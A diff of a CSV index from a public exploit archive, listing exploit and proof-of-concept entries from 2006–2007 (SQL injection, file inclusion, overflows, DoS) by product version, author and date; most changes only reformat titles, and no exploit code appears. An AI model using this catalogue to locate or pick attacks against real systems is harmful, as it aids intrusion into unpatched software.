2880,platforms/windows/local/2880.c,"BlazeVideo HDTV Player <= 2.1 Malformed PLF Buffer Overflow PoC",2006-12-01,"Greg Linares",windows,local,0 2881,platforms/asp/webapps/2881.txt,"Ultimate HelpDesk (XSS/Local File Disclosure) Vulnerabilities",2006-12-01,ajann,asp,webapps,0 @@ -2597,7 +2597,7 @@ id,file,description,date,author,platform,type,port 2921,platforms/php/webapps/2921.txt,"mxBB Module mx_modsdb 1.0 Remote File Include Vulnerability",2006-12-12,Lu7k,php,webapps,0 2922,platforms/windows/dos/2922.txt,"Microsoft Word Document (malformed pointer) Proof of Concept",2006-12-12,DiscoJonny,windows,dos,0 2923,platforms/php/webapps/2923.txt,"BLOG:CMS <= 4.1.3 (NP_UserSharing.php) Remote Inclusion Vulnerability",2006-12-12,"HACKERS PAL",php,webapps,0 -2924,platforms/php/webapps/2924.txt,"mxBB Module kb_mods <= 2.0.2 Remote Inclusion Vulnerabilities",2006-12-12,3l3ctric-Cracker,php,webapps,0 +2924,platforms/php/webapps/2924.txt,"mxBB Module kb_mods <= 2.0.2 Remote Inclusion Vulnerabilities",2006-12-12,3l3ctric-Cracker,php,webapps,0 2925,platforms/php/webapps/2925.pl,"mxBB Module newssuite 1.03 Remote File Inclusion Exploit",2006-12-12,3l3ctric-Cracker,php,webapps,0 2926,platforms/windows/dos/2926.py,"Crob FTP Server 3.6.1 build 263 (LIST/NLST) Denial of Service Exploit",2006-12-13,shinnai,windows,dos,0 2927,platforms/php/webapps/2927.txt,"PhpMyCms <= 0.3 (basic.inc.php) Remote File Include Vulnerability",2006-12-13,v1per-haCker,php,webapps,0 @@ -2674,7 +2674,7 @@ id,file,description,date,author,platform,type,port 2999,platforms/php/webapps/2999.pl,"Ultimate PHP Board <= 2.0b1 (chat/login.php) Code Execution Exploit",2006-12-24,nuffsaid,php,webapps,0 3000,platforms/php/webapps/3000.pl,"Pagetool CMS <= 1.07 (pt_upload.php) Remote File Include Vulnerability",2006-12-24,g00ns,php,webapps,0 3001,platforms/asp/webapps/3001.txt,"Ananda Real Estate <= 3.4 (agent) Remote SQL Injection Vulnerability",2006-12-24,ajann,asp,webapps,0 -3002,platforms/php/webapps/3002.php,"HLStats <=1.34 (hlstats.php) Remote SQL Injection Exploit",2006-12-25,"Michael Brooks",php,webapps,0 +3002,platforms/php/webapps/3002.php,"HLStats <= 1.34 - (hlstats.php) Remote SQL Injection Exploit",2006-12-25,"Michael Brooks",php,webapps,0 3003,platforms/php/webapps/3003.txt,"Jinzora <= 2.7 (include_path) Multiple Remote File Include Vulnerabilities",2006-12-25,nuffsaid,php,webapps,0 3004,platforms/php/webapps/3004.txt,"eNdonesia 8.4 (mod.php/friend.php/admin.php) Multiple Vulnerabilities",2006-12-25,z1ckX(ru),php,webapps,0 3005,platforms/php/webapps/3005.pl,"MTCMS <= 2.0 (admin/admin_settings.php) Remote File Include Exploit",2006-12-25,nuffsaid,php,webapps,0 @@ -2719,7 +2719,7 @@ id,file,description,date,author,platform,type,port 3045,platforms/php/webapps/3045.php,"Cacti 0.8.6i (copy_cacti_user.php) SQL Injection Create Admin Exploit",2006-12-30,rgod,php,webapps,0 3046,platforms/asp/webapps/3046.txt,"SoftArtisans SAFileUp 5.0.14 (viewsrc.asp) Script Source Disclosure",2006-12-30,"Inge Henriksen",asp,webapps,0 3047,platforms/php/webapps/3047.txt,"FreeStyle Wiki <= 3.6.2 (user.dat) Password Disclosure Vulnerability",2006-12-30,bd0rk,php,webapps,0 -3048,platforms/asp/webapps/3048.pl,"Click N Print Coupons <= V2006.01 (key) Remote SQL Injection Exploit",2006-12-30,ajann,asp,webapps,0 +3048,platforms/asp/webapps/3048.pl,"Click N Print Coupons <= 2006.01 - (key) Remote SQL Injection Exploit",2006-12-30,ajann,asp,webapps,0 3049,platforms/php/webapps/3049.php,"IMGallery <= 2.5 Create Uploader Script Exploit",2006-12-30,Kacper,php,webapps,0 3050,platforms/php/webapps/3050.txt,"Enigma 2 Coppermine Bridge (boarddir) Remote File Include Vulnerability",2006-12-30,"Mehmet Ince",php,webapps,0 3051,platforms/php/webapps/3051.txt,"Enigma 2 WordPress Bridge (boarddir) Remote File Include Vulnerability",2006-12-30,"Mehmet Ince",php,webapps,0 @@ -2777,7 +2777,7 @@ id,file,description,date,author,platform,type,port 3103,platforms/php/webapps/3103.php,"@lex Guestbook <= 4.0.2 Remote Command Execution Exploit",2007-01-08,DarkFig,php,webapps,0 3104,platforms/php/webapps/3104.txt,"PPC Search Engine 1.61 (INC) Multiple Remote File Include Vulnerabilities",2007-01-09,IbnuSina,php,webapps,0 3105,platforms/asp/webapps/3105.txt,"MOTIONBORG Web Real Estate <= 2.1 SQL Injection Vulnerability",2007-01-09,ajann,asp,webapps,0 -3106,platforms/php/webapps/3106.txt,"uniForum <= v4 (wbsearch.aspx) Remote SQL Injection Vulnerability",2007-01-09,ajann,php,webapps,0 +3106,platforms/php/webapps/3106.txt,"uniForum <= 4 - (wbsearch.aspx) Remote SQL Injection Vulnerability",2007-01-09,ajann,php,webapps,0 3107,platforms/windows/remote/3107.pm,"FileCOPA FTP Server <= 1.01 (LIST) Remote BoF Exploit (meta)",2007-01-09,"Jacopo Cervini",windows,remote,21 3108,platforms/php/webapps/3108.pl,"Axiom Photo/News Gallery 0.8.6 Remote File Include Exploit",2007-01-09,DeltahackingTEAM,php,webapps,0 3109,platforms/php/webapps/3109.php,"Wordpress <= 2.0.6 wp-trackback.php Remote SQL Injection Exploit",2007-01-10,rgod,php,webapps,0 @@ -2796,7 +2796,7 @@ id,file,description,date,author,platform,type,port 3122,platforms/asp/webapps/3122.pl,"DigiAffiliate <= 1.4 (visu_user.asp id) Remote SQL Injection Exploit",2007-01-13,ajann,asp,webapps,0 3123,platforms/php/webapps/3123.htm,"FdWeB Espace Membre <= 2.01 (path) Remote File Include Exploit",2007-01-13,ajann,php,webapps,0 3124,platforms/php/webapps/3124.php,"ThWboard <= 3.0b2.84-php5 SQL Injection / Code Execution Exploit",2007-01-14,rgod,php,webapps,0 -3125,platforms/php/webapps/3125.c,"JV2 Folder Gallery 3.0 (download.php) Remote File Disclosure Exploit",2007-01-14,PeTrO,php,webapps,0 +3125,platforms/php/webapps/3125.c,"JV2 Folder Gallery 3.0 0 - (download.php) Remote File Disclosure Exploit",2007-01-14,PeTrO,php,webapps,0 3126,platforms/windows/dos/3126.c,"WFTPD Pro Server <= 3.25 SITE ADMN Remote Denial of Service Exploit",2007-01-14,Marsu,windows,dos,0 3127,platforms/windows/dos/3127.c,"Sami FTP Server 2.0.2 (USER/PASS) Remote Buffer Overflow PoC",2007-01-14,Marsu,windows,dos,0 3128,platforms/windows/dos/3128.c,"BolinTech DreamFTP (USER) Remote Buffer Overflow PoC",2007-01-14,Marsu,windows,dos,0 @@ -2811,7 +2811,7 @@ id,file,description,date,author,platform,type,port 3139,platforms/osx/dos/3139.rb,"Colloquy <= 2.1.3545 (INVITE) Format String Denial of Service Exploit",2007-01-17,MoAB,osx,dos,0 3140,platforms/windows/remote/3140.pl,"Sami FTP Server 2.0.2 (USER/PASS) Remote Buffer Overflow Exploit",2007-01-17,UmZ,windows,remote,21 3141,platforms/php/webapps/3141.pl,"MGB 0.5.4.5 (email.php id variable) Remote SQL Injection Exploit",2007-01-17,SlimTim10,php,webapps,0 -3142,platforms/windows/dos/3142.html,"CCRP Folder Treeview Control (ccrpftv6.ocx) IE Denial of Service Exploit",2007-01-17,shinnai,windows,dos,0 +3142,platforms/windows/dos/3142.html,"CCRP Folder Treeview Control (ccrpftv6.ocx) - IE Denial of Service Exploit",2007-01-17,shinnai,windows,dos,0 3143,platforms/php/webapps/3143.php,"Woltlab Burning Board <= 1.0.2, 2.3.6 search.php SQL Injection Exploit",2007-01-17,"silent vapor",php,webapps,0 3144,platforms/php/webapps/3144.pl,"Woltlab Burning Board <= 1.0.2, 2.3.6 search.php SQL Injection Exploit 2",2007-01-17,trew,php,webapps,0 3145,platforms/php/webapps/3145.txt,"PHPMyphorum 1.5a (mep/frame.php) Remote File Include Vulnerability",2007-01-17,v1per-haCker,php,webapps,0 @@ -2831,11 +2831,11 @@ id,file,description,date,author,platform,type,port 3159,platforms/windows/local/3159.cpp,"Microsoft Help Workshop 4.03.0002 (.HPJ) Buffer Overflow Exploit",2007-01-19,porkythepig,windows,local,0 3160,platforms/osx/dos/3160.html,"Transmit.app <= 3.5.5 ftps:// URL Handler Heap Buffer Overflow PoC",2007-01-20,MoAB,osx,dos,0 3161,platforms/php/webapps/3161.txt,"PhpSherpa (include/config.inc.php) Remote File Include Vulnerability",2007-01-20,3l3ctric-Cracker,php,webapps,0 -3162,platforms/php/webapps/3162.txt,"Bradabra <= 2.0.5 (include/includes.php) Remote Inclusion Vulnerability",2007-01-20,GoLd_M,php,webapps,0 +3162,platforms/php/webapps/3162.txt,"Bradabra <= 2.0.5 (include/includes.php) Remote Inclusion Vulnerability",2007-01-20,GoLd_M,php,webapps,0 3163,platforms/php/webapps/3163.txt,"Neon Labs Website <= 3.2 (nl.php g_strRootDir) Remote Inclusion Vuln",2007-01-20,3l3ctric-Cracker,php,webapps,0 3164,platforms/php/webapps/3164.pl,"phpIndexPage <= 1.0.1 (config.php) Remote Inclusion Exploit",2007-01-20,DeltahackingTEAM,php,webapps,0 3165,platforms/php/webapps/3165.txt,"MySpeach <= 2.1b (up.php) Remote Inclusion Vulnerability",2007-01-20,3l3ctric-Cracker,php,webapps,0 -3166,platforms/osx/dos/3166.html,"Apple iChat 3.1.6 v441 aim:// URL Handler Format String Exploit PoC",2007-01-21,MoAB,osx,dos,0 +3166,platforms/osx/dos/3166.html,"Apple iChat 3.1.6 441 - aim:// URL Handler Format String Exploit PoC",2007-01-21,MoAB,osx,dos,0 3167,platforms/osx/dos/3167.c,"Mac OS X 10.4.x Kernel shared_region_map_file_np() Memory Corruption",2007-01-21,"Adriano Lima",osx,dos,0 3168,platforms/windows/remote/3168.java,"Sun Microsystems Java GIF File Parsing Memory Corruption Exploit",2007-01-21,luoluo,windows,remote,0 3169,platforms/php/webapps/3169.txt,"WebChat 0.77 (defines.php WEBCHATPATH) Remote File Include Vuln",2007-01-21,v1per-haCker,php,webapps,0 @@ -2856,13 +2856,13 @@ id,file,description,date,author,platform,type,port 3184,platforms/php/webapps/3184.txt,"phpXD <= 0.3 (path) Remote File Inclusion Vulnerability",2007-01-23,3l3ctric-Cracker,php,webapps,0 3185,platforms/php/webapps/3185.txt,"RPW 1.0.2 (config.php sql_language) Remote File Inclusion Vulnerability",2007-01-24,3l3ctric-Cracker,php,webapps,0 3186,platforms/asp/webapps/3186.txt,"ASP EDGE <= 1.2b (user.asp) Remote SQL Injection Vulnerability",2007-01-24,ajann,asp,webapps,0 -3187,platforms/asp/webapps/3187.txt,"ASP NEWS <= v3 (news_detail.asp) Remote SQL Injection Vulnerability",2007-01-24,ajann,asp,webapps,0 +3187,platforms/asp/webapps/3187.txt,"ASP NEWS <= 3.0 - (news_detail.asp) Remote SQL Injection Vulnerability",2007-01-24,ajann,asp,webapps,0 3189,platforms/hardware/remote/3189.sh,"PA168 Chipset IP Phones Weak Session Management Exploit",2007-01-24,"Adrian ""pagvac"" Pastor",hardware,remote,0 3190,platforms/windows/dos/3190.py,"MS Windows Explorer (AVI) Unspecified Denial of Service Exploit",2007-01-24,shinnai,windows,dos,0 3191,platforms/php/webapps/3191.txt,"vhostadmin 0.1 (MODULES_DIR) Remote File Inclusion Vulnerability",2007-01-24,3l3ctric-Cracker,php,webapps,0 3192,platforms/php/webapps/3192.pl,"Xero Portal (phpbb_root_path) Remote File Include Vulnerablity",2007-01-24,"Mehmet Ince",php,webapps,0 3193,platforms/windows/dos/3193.py,"Microsoft Excel Malformed Palette Record DoS PoC (MS07-002)",2007-01-25,LifeAsaGeek,windows,dos,0 -3194,platforms/asp/webapps/3194.txt,"makit Newsposter Script v3 Remote SQL Injection Vulnerability",2007-01-25,ajann,asp,webapps,0 +3194,platforms/asp/webapps/3194.txt,"makit Newsposter Script 3.0 - Remote SQL Injection Vulnerability",2007-01-25,ajann,asp,webapps,0 3195,platforms/asp/webapps/3195.txt,"GPS CMS 1.2 (print.asp) Remote SQL Injection Vulnerability",2007-01-25,ajann,asp,webapps,0 3196,platforms/php/webapps/3196.php,"Aztek Forum 4.0 Multiple Vulnerabilities Exploit",2007-01-25,DarkFig,php,webapps,0 3197,platforms/asp/webapps/3197.txt,"Forum Livre 1.0 (SQL Injection / XSS) Multiple Remote Vulnerabilities",2007-01-25,ajann,asp,webapps,0 @@ -2899,7 +2899,7 @@ id,file,description,date,author,platform,type,port 3229,platforms/windows/dos/3229.py,"Dev-C++ 4.9.9.2 CPP File Parsing Local Stack Overflow PoC",2007-01-30,shinnai,windows,dos,0 3230,platforms/osx/dos/3230.rb,"Apple iChat Bonjour 3.1.6.441 Multiple Denial of Service Exploit",2007-01-30,MoAB,osx,dos,0 3231,platforms/php/webapps/3231.txt,"phpBB2 MODificat <= 0.2.0 (functions.php) Remote Include Vulnerability",2007-01-30,"Mehmet Ince",php,webapps,0 -3232,platforms/php/webapps/3232.txt,"Michelles L2J Dropcalc <= v4 Remote SQL Injection Vulnerability",2007-01-31,Codebreak,php,webapps,0 +3232,platforms/php/webapps/3232.txt,"Michelles L2J Dropcalc <= 4 - Remote SQL Injection Vulnerability",2007-01-31,Codebreak,php,webapps,0 3233,platforms/asp/webapps/3233.txt,"Fullaspsite Asp Hosting Sitesi (tr) SQL Injection Vulnerability",2007-01-31,cl24zy,asp,webapps,0 3234,platforms/php/webapps/3234.txt,"ExoPHPDesk <= 1.2.1 (faq.php) Remote SQL Injection Vulnerability",2007-01-31,ajann,php,webapps,0 3235,platforms/php/webapps/3235.txt,"Phpbb Tweaked <= 3 (phpbb_root_path) Remote Inclusion Vulnerability",2007-01-31,"Mehmet Ince",php,webapps,0 @@ -2907,7 +2907,7 @@ id,file,description,date,author,platform,type,port 3237,platforms/php/webapps/3237.txt,"Cadre PHP Framework Remote File Include Vulnerability",2007-01-31,y3dips,php,webapps,0 3238,platforms/php/webapps/3238.txt,"PHPMyRing <= 4.1.3b (fichier) Remote File Include Vulnerability",2007-01-31,ajann,php,webapps,0 3239,platforms/php/webapps/3239.htm,"Extcalendar <= 2 (profile.php) Remote User Pass Change Exploit",2007-01-31,ajann,php,webapps,0 -3240,platforms/php/webapps/3240.txt,"JV2 Folder Gallery <= 3.0 Remote File Include Vulnerability",2007-01-31,"ThE dE@Th",php,webapps,0 +3240,platforms/php/webapps/3240.txt,"JV2 Folder Gallery <= 3.0 - Remote File Include Vulnerability",2007-01-31,"ThE dE@Th",php,webapps,0 3241,platforms/asp/webapps/3241.txt,"Hunkaray Duyuru Scripti (tr) Remote SQL Injection Exploit",2007-01-31,cl24zy,asp,webapps,0 3242,platforms/php/webapps/3242.txt,"Omegaboard <= 1.0beta4 (functions.php) Remote File Include Vuln",2007-01-31,"Mehmet Ince",php,webapps,0 3243,platforms/php/webapps/3243.txt,"Cerulean Portal System 0.7b Remote File Include Vulnerability",2007-01-31,"Mehmet Ince",php,webapps,0 @@ -2940,7 +2940,7 @@ id,file,description,date,author,platform,type,port 3270,platforms/php/webapps/3270.pl,"Categories hierarchy phpBB Mod 2.1.2 (phpbb_root_path) RFI Exploit",2007-02-05,"Mehmet Ince",php,webapps,0 3271,platforms/php/webapps/3271.php,"GGCMS <= 1.1.0 RC1 Remote Code Execution Exploit",2007-02-05,Kacper,php,webapps,0 3272,platforms/windows/dos/3272.html,"MS Internet Explorer 6 (mshtml.dll) Null Pointer Dereference Exploit",2007-02-05,AmesianX,windows,dos,0 -3273,platforms/tru64/local/3273.ksh,"HP Tru64 Alpha OSF1 v5.1 (ps) Information Leak Exploit",2007-02-06,bunker,tru64,local,0 +3273,platforms/tru64/local/3273.ksh,"HP Tru64 Alpha OSF1 5.1 - (ps) Information Leak Exploit",2007-02-06,bunker,tru64,local,0 3274,platforms/windows/remote/3274.txt,"MySQL 4.x/5.0 User-Defined Function Command Execution Exploit (win)",2007-02-06,"Marco Ivaldi",windows,remote,3306 3275,platforms/php/webapps/3275.txt,"LightRO CMS 1.0 (inhalt.php) Remote File Include Vulnerability",2007-02-06,ajann,php,webapps,0 3276,platforms/windows/dos/3276.cpp,"FlashFXP 3.4.0 build 1145 Remote Buffer Overflow DoS Exploit",2007-02-06,Marsu,windows,dos,0 @@ -2964,7 +2964,7 @@ id,file,description,date,author,platform,type,port 3294,platforms/hardware/remote/3294.txt,"IP3 NetAccess < 4.1.9.6 Remote Arbitrary File Disclosure Vulnerability",2007-02-11,"Sebastian Wolfgarten",hardware,remote,80 3295,platforms/asp/webapps/3295.txt,"Philboard <= 1.14 (philboard_forum.asp) SQL Injection Vulnerability",2007-02-12,"Mehmet Ince",asp,webapps,0 3296,platforms/windows/remote/3296.c,"uTorrent 1.6 build 474 (announce) Key Remote Heap Overflow Exploit",2007-02-12,defsec,windows,remote,0 -3297,platforms/php/webapps/3297.htm,"AT Contenator <= v1.0 (Root_To_Script) Remote File Include Exploit",2007-02-13,ajann,php,webapps,0 +3297,platforms/php/webapps/3297.htm,"AT Contenator <= 1.0 - (Root_To_Script) Remote File Include Exploit",2007-02-13,ajann,php,webapps,0 3298,platforms/php/webapps/3298.pl,"Xaran Cms <= 2.0 (xarancms_haupt.php) SQL Injection Exploit",2007-02-13,ajann,php,webapps,0 3299,platforms/php/webapps/3299.pl,"phpCC <= 4.2 beta (nickpage.php npid) Remote SQL Injection Exploit",2007-02-13,ajann,php,webapps,0 3300,platforms/php/webapps/3300.pl,"Advanced Poll <= 2.0.5-dev Remote Code Execution Exploit",2007-02-13,diwou,php,webapps,0 @@ -2979,15 +2979,15 @@ id,file,description,date,author,platform,type,port 3309,platforms/php/webapps/3309.txt,"Jupiter CMS 1.1.5 (index.php) Local/Remote File Include Vulnerability",2007-02-14,DarkFig,php,webapps,0 3310,platforms/php/webapps/3310.php,"Jupiter CMS 1.1.5 (Client-IP) Remote SQL Injection Exploit",2007-02-14,DarkFig,php,webapps,0 3311,platforms/php/webapps/3311.php,"Jupiter CMS 1.1.5 Remote File Upload Exploit",2007-02-14,DarkFig,php,webapps,0 -3312,platforms/php/webapps/3312.pl,"Drupal < 5.1 (post comments) Remote Command Execution Exploit v2",2007-02-15,str0ke,php,webapps,0 -3313,platforms/php/webapps/3313.pl,"Drupal < 4.7.6 (post comments) Remote Command Execution Exploit v2",2007-02-15,str0ke,php,webapps,0 +3312,platforms/php/webapps/3312.pl,"Drupal < 5.1 - (post comments) Remote Command Execution Exploit (2)",2007-02-15,str0ke,php,webapps,0 +3313,platforms/php/webapps/3313.pl,"Drupal < 4.7.6 - (post comments) Remote Command Execution Exploit (2)",2007-02-15,str0ke,php,webapps,0 3314,platforms/php/webapps/3314.txt,"ZebraFeeds 1.0 (zf_path) Remote File Include Vulnerabilities",2007-02-15,"ThE dE@Th",php,webapps,0 3315,platforms/php/webapps/3315.txt,"nabopoll 1.2 (survey.inc.php path) Remote File Include Vulnerability",2007-02-15,Cr@zy_King,php,webapps,0 3317,platforms/asp/webapps/3317.txt,"CodeAvalanche News 1.x (CAT_ID) Remote SQL Injection Vulnerability",2007-02-15,beks,asp,webapps,0 3318,platforms/asp/webapps/3318.txt,"Aktueldownload Haber scripti (id) Remote SQL Injection Vulnerability",2007-02-15,"Mehmet Ince",asp,webapps,0 3319,platforms/windows/remote/3319.pl,"MailEnable Enterprise <= 2.32 - 2.34 Remote Buffer Overflow Exploit",2007-02-16,mu-b,windows,remote,143 3320,platforms/windows/remote/3320.pl,"MailEnable Professional 2.35 Remote Buffer Overflow Exploit",2007-02-16,mu-b,windows,remote,143 -3321,platforms/asp/webapps/3321.txt,"Snitz Forums 2000 v3.1 SR4 (pop_profile.asp) SQL Injection Vulnerability",2007-02-16,"Mehmet Ince",asp,webapps,0 +3321,platforms/asp/webapps/3321.txt,"Snitz Forums 2000 3.1 SR4 - (pop_profile.asp) SQL Injection Vulnerability",2007-02-16,"Mehmet Ince",asp,webapps,0 3322,platforms/php/webapps/3322.htm,"VS-News-System <= 1.2.1 (newsordner) Remote File Include Exploit",2007-02-16,ajann,php,webapps,0 3323,platforms/php/webapps/3323.htm,"VS-Link-Partner <= 2.1 (script_pfad) Remote File Include Exploit",2007-02-16,ajann,php,webapps,0 3324,platforms/php/webapps/3324.txt,"Htaccess Passwort Generator 1.1 (ht_pfad) RFI Vulnerability",2007-02-16,kezzap66345,php,webapps,0 @@ -3040,10 +3040,10 @@ id,file,description,date,author,platform,type,port 3372,platforms/php/webapps/3372.php,"CS-Gallery 2.0 (index.php album) Remote File Include Exploit",2007-02-24,burncycle,php,webapps,0 3373,platforms/php/webapps/3373.pl,"phpBB Module NoMoKeTos Rules 0.0.1 Remote File Include Exploit",2007-02-24,bd0rk,php,webapps,0 3374,platforms/php/webapps/3374.txt,"PHP-MIP 0.1 (top.php laypath) Remote File Include Vulnerability",2007-02-25,GoLd_M,php,webapps,0 -3375,platforms/multiple/remote/3375.pl,"Oracle 10g KUPW$WORKER.MAIN SQL Injection Exploit v2",2007-02-26,bunker,multiple,remote,0 -3376,platforms/multiple/remote/3376.pl,"Oracle 10g KUPV$FT.ATTACH_JOB SQL Injection Exploit v2",2007-02-26,bunker,multiple,remote,0 -3377,platforms/multiple/remote/3377.pl,"Oracle 9i/10g DBMS_METADATA.GET_DDL SQL Injection Exploit v2",2007-02-26,bunker,multiple,remote,0 -3378,platforms/multiple/remote/3378.pl,"Oracle 9i/10g ACTIVATE_SUBSCRIPTION SQL Injection Exploit v2",2007-02-26,bunker,multiple,remote,0 +3375,platforms/multiple/remote/3375.pl,"Oracle 10g KUPW$WORKER.MAIN - SQL Injection Exploit (2)",2007-02-26,bunker,multiple,remote,0 +3376,platforms/multiple/remote/3376.pl,"Oracle 10g KUPV$FT.ATTACH_JOB - SQL Injection Exploit (2)",2007-02-26,bunker,multiple,remote,0 +3377,platforms/multiple/remote/3377.pl,"Oracle 9i/10g DBMS_METADATA.GET_DDL - SQL Injection Exploit (2)",2007-02-26,bunker,multiple,remote,0 +3378,platforms/multiple/remote/3378.pl,"Oracle 9i/10g ACTIVATE_SUBSCRIPTION - SQL Injection Exploit (2)",2007-02-26,bunker,multiple,remote,0 3379,platforms/php/webapps/3379.php,"STWC-Counter <= 3.4.0 (downloadcounter.php) RFI Exploit",2007-02-26,burncycle,php,webapps,0 3380,platforms/windows/remote/3380.txt,"Kiwi CatTools TFTP <= 3.2.8 Remote Path Traversal Vulnerability",2007-02-27,"Sergey Gordeychik",windows,remote,0 3381,platforms/windows/remote/3381.pl,"NetProxy <= 4.03 Web Filter Evasion / Bypass Logging Exploit",2007-02-27,"Craig Heffner",windows,remote,0 @@ -3084,18 +3084,18 @@ id,file,description,date,author,platform,type,port 3417,platforms/windows/local/3417.php,"PHP <= 4.4.6 mssql_[p]connect() Local Buffer Overflow Exploit",2007-03-05,rgod,windows,local,0 3418,platforms/windows/dos/3418.pl,"Mercury/32 Mail Server <= 4.01b (check) Buffer Overflow Exploit PoC",2007-03-06,mu-b,windows,dos,0 3419,platforms/windows/dos/3419.txt,"MS Windows (.doc File) Malformed Pointers Denial of Service Exploit",2007-03-06,Marsu,windows,dos,0 -3420,platforms/windows/remote/3420.html,"WinZip <= 10.0.7245 FileView ActiveX Buffer Overflow Exploit v2",2007-03-06,prdelka,windows,remote,0 +3420,platforms/windows/remote/3420.html,"WinZip <= 10.0.7245 - FileView ActiveX Buffer Overflow Exploit (2)",2007-03-06,prdelka,windows,remote,0 3421,platforms/windows/dos/3421.html,"Macromedia 10.1.4.20 SwDir.dll Internet Explorer Stack Overflow DoS",2007-03-07,shinnai,windows,dos,0 -3422,platforms/windows/remote/3422.pl,"Winamp <= 5.12 (Crafted PLS) Remote Buffer Overflow Exploit (perl)",2007-03-07,"Umesh Wanve",windows,remote,0 +3422,platforms/windows/remote/3422.pl,"Winamp <= 5.12 - (.pls) Remote Buffer Overflow Exploit (Perl Version)",2007-03-07,"Umesh Wanve",windows,remote,0 3423,platforms/php/webapps/3423.txt,"PHP-Nuke Module PostGuestbook 0.6.1 (tpl_pgb_moddir) RFI Vulnerability",2007-03-07,GoLd_M,php,webapps,0 3424,platforms/multiple/local/3424.php,"PHP <= 5.2.1 substr_compare() Information Leak Exploit",2007-03-07,"Stefan Esser",multiple,local,0 3425,platforms/multiple/remote/3425.txt,"mod_security <= 2.1.0 (ASCIIZ byte) POST Rules Bypass Vulnerability",2007-03-07,"Stefan Esser",multiple,remote,0 3426,platforms/linux/local/3426.php,"PHP < 4.4.5 / 5.2.1 (shmop Functions) Local Code Execution Exploit",2007-03-07,"Stefan Esser",linux,local,0 3427,platforms/linux/local/3427.php,"PHP < 4.4.5 / 5.2.1 (shmop) SSL RSA Private-Key Disclosure Exploit",2007-03-07,"Stefan Esser",linux,local,0 -3428,platforms/php/webapps/3428.txt,"Flat Chat 2.0 (include online.txt) Remote Code Execution Vulnerability",2007-03-07,Dj7xpl,php,webapps,0 +3428,platforms/php/webapps/3428.txt,"Flat Chat 2.0 (include online.txt) Remote Code Execution Vulnerability",2007-03-07,Dj7xpl,php,webapps,0 3429,platforms/windows/local/3429.php,"PHP COM extensions (inconsistent Win32) safe_mode Bypass Exploit",2007-03-07,n/a,windows,local,0 3430,platforms/windows/dos/3430.html,"Adobe Reader plug-in AcroPDF.dll 8.0.0.0 Resource Consumption",2007-03-08,shinnai,windows,dos,0 -3431,platforms/windows/local/3431.php,"PHP 4.4.6 crack_opendict() Local Buffer Overflow Exploit PoC",2007-03-08,rgod,windows,local,0 +3431,platforms/windows/local/3431.php,"PHP 4.4.6 crack_opendict() Local Buffer Overflow Exploit PoC",2007-03-08,rgod,windows,local,0 3432,platforms/windows/dos/3432.pl,"TFTPDWIN Server 0.4.2 (UDP) Denial of Service Exploit",2007-03-08,"Umesh Wanve",windows,dos,0 3433,platforms/windows/dos/3433.html,"Rediff Toolbar ActiveX Control Remote Denial of Service Exploit",2007-03-08,"Umesh Wanve",windows,dos,0 3434,platforms/multiple/dos/3434.c,"Snort 2.6.1.1/2.6.1.2/2.7.0 (fragementation) Remote DoS Exploit",2007-03-08,Antimatt3r,multiple,dos,0 @@ -3112,7 +3112,7 @@ id,file,description,date,author,platform,type,port 3447,platforms/php/webapps/3447.txt,"Grayscale Blog 0.8.0 (Security Bypass/SQL/XSS) Multiple Remote Vulns",2007-03-09,Omni,php,webapps,0 3448,platforms/php/webapps/3448.txt,"WORK system e-commerce <= 3.0.5 Remote File Inclusion Vulnerability",2007-03-10,"Rodrigo Duarte",php,webapps,0 3449,platforms/php/webapps/3449.txt,"HC Newssystem 1.0-1.4 (index.php ID) Remote SQL Injection Vulnerability",2007-03-10,WiLdBoY,php,webapps,0 -3450,platforms/php/webapps/3450.php,"NukeSentinel <= 2.5.06 (mysql >= 4.0.24) Remote SQL Injection Exploit",2007-03-10,DarkFig,php,webapps,0 +3450,platforms/php/webapps/3450.php,"NukeSentinel <= 2.5.06 (MySQL => 4.0.24) - Remote SQL Injection Exploit",2007-03-10,DarkFig,php,webapps,0 3451,platforms/windows/local/3451.c,"Oracle 10g (PROCESS_DUP_HANDLE) Local Privilege Elevation (win32)",2007-03-10,"Cesar Cerrudo",windows,local,0 3452,platforms/multiple/remote/3452.php,"PHP <= 5.2.0 ext/filter FDF Post Filter Bypass Exploit",2007-03-10,"Stefan Esser",multiple,remote,0 3453,platforms/windows/dos/3453.py,"MS Windows DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption",2007-03-10,h07,windows,dos,0 @@ -3148,11 +3148,11 @@ id,file,description,date,author,platform,type,port 3484,platforms/php/webapps/3484.txt,"WebLog (index.php file) Remote File Disclosure Vulnerability",2007-03-15,Dj7xpl,php,webapps,0 3485,platforms/php/webapps/3485.txt,"Company WebSite Builder PRO 1.9.8 (INCLUDE_PATH) RFI Vulnerability",2007-03-15,the_day,php,webapps,0 3486,platforms/php/webapps/3486.txt,"Groupit 2.00b5 (c_basepath) Remote File Inclusion Vulnerability",2007-03-15,the_day,php,webapps,0 -3487,platforms/php/webapps/3487.pl,"CcMail 1.0.1 (update.php functions_dir) Remote File Inclusion Exploit",2007-03-15,Crackers_Child,php,webapps,0 +3487,platforms/php/webapps/3487.pl,"CcMail 1.0.1 (update.php functions_dir) Remote File Inclusion Exploit",2007-03-15,Crackers_Child,php,webapps,0 3488,platforms/windows/local/3488.php,"PHP <= 4.4.6 ibase_connect() Local Buffer Overflow Exploit",2007-03-15,rgod,windows,local,0 3489,platforms/php/webapps/3489.txt,"Creative Guestbook 1.0 Multiple Remote Vulnerabilities",2007-03-15,Dj7xpl,php,webapps,0 3490,platforms/php/webapps/3490.txt,"WBBlog (XSS/SQL) Multiple Remote Vulnerabilities",2007-03-15,"Mehmet Ince",php,webapps,0 -3491,platforms/bsd/remote/3491.py,"OpenBSD ICMPv6 Fragment Remote Execution Exploit PoC",2007-03-15,"Core Security",bsd,remote,0 +3491,platforms/bsd/remote/3491.py,"OpenBSD - ICMPv6 Fragment Remote Execution Exploit PoC",2007-03-15,"Core Security",bsd,remote,0 3492,platforms/php/webapps/3492.txt,"WebCalendar 0.9.45 (includedir) Remote File Inclusion Vulnerability",2007-03-15,Drackanz,php,webapps,0 3493,platforms/asp/webapps/3493.txt,"Absolute Image Gallery 2.0 (gallery.asp categoryid) SQL Injection Vuln",2007-03-15,WiLdBoY,asp,webapps,0 3494,platforms/php/webapps/3494.txt,"McGallery 0.5b (download.php) Arbitrary File Download Vulnerability",2007-03-15,Piker,php,webapps,0 @@ -3198,16 +3198,16 @@ id,file,description,date,author,platform,type,port 3535,platforms/hardware/dos/3535.pl,"Grandstream Budge Tone-200 IP Phone (Digest domain) DoS 